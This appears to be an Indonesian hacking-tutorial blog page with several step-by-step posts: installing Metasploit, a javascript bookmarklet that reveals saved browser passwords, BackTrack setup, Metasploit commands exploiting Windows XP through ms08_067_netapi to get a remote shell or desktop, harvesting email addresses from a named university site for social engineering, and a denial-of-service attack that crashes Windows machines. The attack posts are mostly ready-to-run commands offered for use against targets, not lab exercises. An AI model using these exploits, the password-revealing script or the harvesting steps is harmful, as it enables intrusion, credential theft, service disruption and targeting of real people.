Install metasploit di linux

Metasploit adalah sebuah tools  yang banyak digunakan untuk melakukan exploitasi saat ini, dapat berjalan untuk sistem operasi linux dan windows, dengan Metasploit sahabat bisa melakukan banyak hal, mulai dari exploitasi windows, remote desktop, sniffing bahkan sampai denial of service. Bagi sahabat pengguna Backtrack tidak perlu kuatir karena tools ini wajib disertakan didalamnya, buat sahabat yang menggunakan distro lain juga bisa menambahkan repository dari Backtrack atau bisa melakukan instalasi secara manual seperti berikut.

1. Download aplikasi pada situs resmi.

wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run

2. Install paket ruby.

sudo apt-get install ruby1.8 ruby1.8-rel libopenssl

3. Install aplikasi

sudo chmod + x metasploit-latest-linux-installer.run
sudo ./metasploit-latest-linux-installer.run

Untuk melihat tutorial exploitasi yang lain sahabat bisa mencari pada kotak pencarian.

Read More

Script untuk melihat Password

Mungkin pernah ketika kita membuka browser kemudian mengakses halaman facebook, pada field username dan passwordnya masih terdapat email dan password yang tak senggaja tersimpan akibat option "Remember Me". Sebenarnya hal ini sangat berbahaya, karena password yang terlihat berbentuk asterisk dapat dibaca isinya dengan beberapa software yang sangat gampang untuk didapatkan di Internet.

Dan kali ini kita akan menggunakan software untuk dapat melihat password Astersik, tapi kita menggunakan potongan script javascript yang juga bisa digunakan untuk membaca password yang berbentuk asterisk. Kelemahan dari script ini adalah tidak bisa digunakan untuk browser versi up to date (jangan sedih ya).

Requirements :
Browser firefox, Mozilla, Opera, dll (semoga versi yang pakai masih bisa).

Target :
Situs yang username dan passwordnya masih tersimpan.

Step by Step :
Perhatikan dan ikuti setiap langkah yang berikut ini.

1. Buka browser, arahkan ke sebuah website (semoga username dan password tersimpan)
2. Copy script dibawah ini ke linkbar kemudian tekan enter
   

   javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == %22password%22) s += f[i].value + %22\n%22; } } if (s) alert(%22menurut www.gilakomputer.net passwordnya adalah:\n\n%22 + s); else alert(%22Password Sudah hilang.Untuk belajar sniffing Password kunjungi www.gilakomputer.net%22);})();

Type : Tutorial
Level : Easy

Search Keyword :
Melihat password astersik, cara membaca password asterisk, cara melihat password asterisk, Script untuk melihat password asterisk

Read More

Menganti kde menjadi fluxbox dibacktrack

Fluxbox adalah salah satu Desktop Environment yang bisa digunakan di sistem operasi linux. Kelebihan dari fluxbox adalah tampilannya yang simple dibandingkan dengan Desktop Environment lain yang ada. Selain itu penggunaan FluxBox juga lebih ringan sehingga tidak banyak menggunakan memory. Di versi BackTrack 4 kebawah yang masih menggunakan KDE sebagai Desktop Environment Fluxbox ikut dihadirkan pada paket-paket aplikasi, sehingga kalau sahabat masih menggunakan BackTrack 4 kebawah bisa mengganti Desktop Environmentnya dari KDE ke Fluxbox.

Requirements :
BackTrack 4 (versi sebelumnya)

Step by Step :
Perhatikan dan ikuti setiap langkah yang berikut ini.

Merubah KDE kepada FluxBox

1. Buka terminal, Applications > Accessories > Terminal
2. Kemudian ketik perintah dibawah ini :
   

   root@bt:~# dragon
   root@bt:~# desktop fluxbox
   root@bt:~# flux-for-back -s
   root@bt:~# 1
   root@bt:~# reboot

Merubah FluxBox Menjadi KDE

1. Buka terminal, Applications > Accessories > Terminal
2. Kemudian ketik perintah dibawah ini :
   

   root@bt:~# dragon
   root@bt:~# desktop kde
   root@bt:~# flux-for-back -s
   root@bt:~# 1
   root@bt:~# reboot

Type : Tutorial
Level : Easy

Search Keyword :
Tutorial fluxbox dibacktrack, backtrack 4 fluxbox, mengganti fluxbox di backtrack, mengganti fluxbox, tutorial fluxbox, setting fluxbox.

Read More

Menambahkan Repository Backtrack

Distro Backtrack sebagai distro yang memang dikhususkan untuk dapat melakukan Penetrasi pada sistem, sehingga tools didalamnya lebih banyak adalah tools yang digunakan untuk melakukan kegiatan Hacking.

Kita patut senang karena Backtrack dibangun didalam sistem operasi linux, maka dengan mudah kita dapat menambahkan repositorynya kedalam sistem operasi linux yang sedang kita gunakan. Sehingga kita tetap dapat menggunakan tools yang ada diBacktrack tanpa harus mengganti sistem operasi. Disini kita menggunakan Distro Ubuntu(bisa versi apa saja, OS linux yg lain juga bisa diaplikasikan) yang kemudian akan ditambahkan repository backtrack.

Requirements :
Ubuntu OS (versi apa saja)
Distro Linux

Step by Step :
Perhatikan dan ikuti setiap langkah yang berikut ini.

1. Buka Terminal Ubuntu (Ctrl + F2 > gnome-terminal) atau buka Application > Accessories > Terminal.
2. Ketik sudo gedit /etc/apt/source.list/ kemudian tambahkan alamat repository dibawah ini dibaris paling bawah :
   

   deb http://archive.offensive-security.com pwnsauce main microverse macroverse restricted universe multiverse

   * untuk menonaktifkan cukup tambahkan tanda pagar(#) didepan kata deb.
3. Tambahkan juga key gpg-nya.
   

   sudo wget -q http://archive.offensive-security.com/backtrack.gpg -O- | sudo apt-key add -
   sudo apt-get update

4. Untuk Installasi Aplikasi bisa melalui Terminal, Ubuntu Software Center dan Sysnaptic Package Manager.

Type : Tutorial
Level : Easy

Search Keyword :
Menambahkan repository backtrack di ubuntu, menambahkan repository backtrack 5 r3 di ubuntu, menambahkan repository backtrack 5 r3 di linux, Repository BackTrack 5 r3, menambahkan repository backtrack di ubuntu 11.04, menambahkan repository backtrack di ubuntu 11.10, menambahkan repository backtrack di ubuntu 12.04, menambahkan repository backtrack di ubuntu 12.10, Menambahkan Repository Ubuntu 10.04 Pada Backtrack 5

Read More

Remote Desktop dengan Metasploit

Sebelumnya sahabat bisa melihat bagaimana mudahnya kita mendapatkan akses kepada sebuah komputer dengan hanya dengan melakukan Exploitasi Sistem Operasi Windows. Dan saat ini kita akan melakukan serangan untuk dapat melakukan remote desktop kepada sistem Operasi Windows. Disini kita akan menggunakan payload windows/vncinject/bind_tcp yang dapat melakukan exploit dengan memenfaatkan kelemahan pada aplikasi remote desktop di windows XP SP 2 dan versi dibawahnya.

Requirements :
BackTrack OS
Metasploit Framework

Target :
Windows XP SP 2

Step by Step :
Perhatikan dan ikuti setiap langkah yang berikut ini.

1. Jalankan Metasploit.
   

   root@bt:~# msfconsole

   
2. Jalankan perintah untuk serangan.
   

   use exploit/windows/smb/ms08_067_netapi
   set PAYLOAD windows/vncinject/bind_tcp
   set RHOST IP_TARGET
   exploit

   
3. Jika Serangan berhasil maka akan keluar desktop dari komputer target.
   
   

Type : Tutorial
Level : Easy

Search Keyword :
remote windows dengan exploit, exploit remote desktop, tutorial exploit windows, Remote Desktop dengan Metasploit, serangan remote desktop, windows xp vulnerbility

Read More

Mencari email dari sebuah website

Mungkin anda adalah seorang Email Collector yang memang hobi menyimpan ratusan alamat email dan berpikir suatu saat akan berguna (semoga saja).
Kalau memang anda seorang Email Collector mungkin artikel ini akan pas untuk membantu anda menggumpulkan lebih cepat dan banyak email dari sebuah website menggunakan aplikasi Metasploit. Selain itu ini juga bisa menjadi salah satu tehnik FootPrinting yang bisa digunakan untuk mendapatkan banyak informasi.

Requirements :
BackTrack OS
Metasploit Framework

Target :
unai.edu (kampus ane)

Step by Step :
Perhatikan dan ikuti setiap langkah yang berikut ini.

1. Jalankan Metasploit.
   

   root@bt:~# msfconsole

   
2. Mulai lakukan pencarian.
   

   use gather/search_email_collector
   set domain [contohnya kaskus.us]
   run

   

Email yang sahabat dapatkan bisa digunakan untuk melakukan social engginer.

Type : Tutorial
Level : Easy

Search Keyword :
gather/search_email_collector, mencari email target, footprinting dengan metasploit, mendapatkan email target, cara menggumpulkan email, menyerang email

Read More

Membuat Terkoneksi otomatis dibacktrack 4

Perbedaan yang anda dapatkan ketika masih menggunakan Backtrack versi 4 kebawah adalah untuk dapat tersambung dengan Internet anda perlu terlebih dahulu mengaktifkan kartu jaringan dengan menggunakan perintah start-network, baru kemudian menggunakan aplikasi Wicd untuk terhubung dengan AP.
Berikut adalah cara membuat perintah diatas menjadi otomatis dijalankan pada saat anda menjalankan Backtrack 4.

Requirements :
BackTrack 4 (versi Kebawah)

Step by Step :
Perhatikan dan ikuti setiap langkah yang berikut ini.

1. Buka terminal kemudian buka file .bash_profile
   

   root@bt:~# gedit /root/.bash_profile

   
2. kemudian masukan perintah untuk melakukan koneksi.
   

   start-network
   wicd-client

   
3. Simpan dan reboot, maka BackTrack akan secara otomatis terkoneksi saat dinyalakan.

Update : Pada Backtrack 5 anda tidak perlu melakukan lagi hal diatas karena Sudah secara otomatis kartu jaringan diaktifkan pada saat login.

Type : Tutorial  
Level : Easy

Search Keyword : Mengkoneksikan backtrack dengan internet, Koneksi backtrack, jaringan dibacktrack 4, Backtrack 4, tutorial jaringan dibacktrack 4, setting jaringan dibacktrack 4

Read More

Exploit Windows

Exploit ada sebuah kode yang digunakan untuk dapat menyerang sebuah Sistem Keamanan Komputer.
Exploit banyak digunakan orang-orang yang memang bekerja untuk mencari kelemahan(Vulnerability) pada sebuah Komputer atau Perangkat Lunak.
Berikut adalah contoh dari serangan menggunakan Exploit ms08_067_netapi yang sering digunakan untuk menyerang sistem operasi windows, khusus yang versi windows XP SP 2 kebawah.

Requirements :
BackTrack OS
Metasploit Framework

Target :
Windows XP SP 2
Windows server 2003

Step by Step :
Perhatikan dan ikuti setiap langkah yang berikut ini.

1. Cek port target pada port 445.
   

   root@bt:~# nmap ip-target

   
2. Jalankan Metasploit.
   

   root@bt:~# msfconsole

   
3. Jalankan Perintah untuk Melakukan Serangan.
   

   nmap ip-target
   use windows/smb/ms08_067_netapi
   set payload windows/meterpreter/bind_tcp
   set lhost ip-kita
   set rhost ip-target
   exploit

   
4. Jika serangan berhasil maka kita akan mendapatkan akses kepada sistem target.
   

   execute -f cmd.exe -c -i

   

Type : Tutorial
Level : Easy

Search Keyword :
Exploit windows, cara exploit windows, tutorial exploit windows, exploit windows xp sp 2, windows/meterpreter/bind_tcp, windows xp vulnerbility

Read More

Denial of Service dengan Metasploit

Denial Of Service atau biasa disingkat dengan DOS adalah sebuah serangan yang dilakukan untuk melumpuhkan sebuah sistem atau jaringan untuk maksud-maksud tertentu dengan jalan mengirimkan paket dalam jumlah yang sangat banyak, sehingga Sistem atau Jaringan yang menerima paket-paket tersebut manjadi crash.
Berikut adalah serangan DOS menggunakan kelemahan yang terdapat pada SVR.SYS yang betugas sebagai driver sistem operasi windows.

Requirements :
BackTrack OS
Metasploit Framework

Target :
Windows XP SP 2
Windows server 2003

Step by Step :
Perhatikan dan ikuti setiap langkah yang berikut ini.

1. Jalankan metasploit.
   

   root@bt:~# msfconsole

   
2. Cek pada Port 445 dari komputer target apakah terbuka atau tidak.
   

   root@bt:~# nmap IP_TARGET

   
3. Jalankan perintah dibawah ini untuk melakukan serangan.
   

   use dos/windows/smb/ms06_063_trans
   set LPORT 445
   set RHOST IP_TARGET
   run

   
4. Jika Serangan berhasil dilakukan maka komputer target akan mengalami Blue Screen Of Death.
   
   

Type : Tutorial
Level : Easy

Search Keyword :
Serangan dos menggunakan metasploit, Denial of Service dengan Metasploit, dos/windows/smb/ms06_063_trans, bluescreen dengan metasploit

Read More